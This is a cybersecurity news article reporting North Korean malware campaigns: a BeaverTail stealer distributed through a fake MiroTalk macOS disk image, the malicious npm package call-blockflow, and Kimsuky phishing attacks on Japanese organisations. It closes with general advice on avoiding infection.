Cybersecurity experts have identified a new variant of the BeaverTail malware, used by North Korean hackers, now targeting macOS users. This malware, previously known for attacking job seekers, is being distributed through a fake version of the MiroTalk video call service.
The malicious file, “MiroTalk.dmg,” appears to be a legitimate Apple macOS disk image but instead installs BeaverTail, a JavaScript-based stealer malware. Initially discovered in 2023, BeaverTail was part of the “Contagious Interview” campaign, which aimed to infect software developers during supposed job interviews.
BeaverTail steals sensitive information from web browsers and cryptocurrency wallets, and it can also deliver additional payloads like the Python-based InvisibleFerret backdoor, which installs AnyDesk for persistent remote access.
Previously, BeaverTail was spread through fake npm packages on GitHub and the npm registry. The latest attack involves hackers inviting victims to a hiring meeting via the infected MiroTalk hosted on mirotalk[.]net. Analysis of the DMG file shows it steals data from cryptocurrency wallets, iCloud Keychain, and browsers like Chrome, Brave, and Opera, and it downloads additional Python scripts from a remote server.
DPRK hackers’ skill in targeting macOS, often using social engineering techniques. The disclosure coincides with the discovery of a new malicious npm package named call-blockflow by Phylum. This package mimics the legitimate call-bind library but downloads a remote binary file while evading detection.
The call-blockflow package, likely created by the Lazarus Group, was removed from npm shortly after being uploaded, but not before it was downloaded 18 times. This activity, involving over three dozen malicious packages, has been ongoing since September 2023.
JPCERT/CC recently issued an advisory about cyber attacks by the North Korean Kimsuky actor targeting Japanese organizations. These attacks begin with phishing messages containing a malicious executable that downloads a Visual Basic Script (VBS), which then retrieves a PowerShell script to harvest user data and execute a keylogger named InfoKey.
While attacks on Japanese organizations by Kimsuky have been few, JPCERT/CC warns of the potential for increased targeting in the region.
To prevent infections, macOS users should exercise caution when downloading and executing files from unfamiliar sources. Always verify the legitimacy of any software by checking official websites and trusted app stores. Additionally, be wary of unsolicited emails or messages requesting you to join meetings or download software, as these could be phishing attempts leading to malware infection.
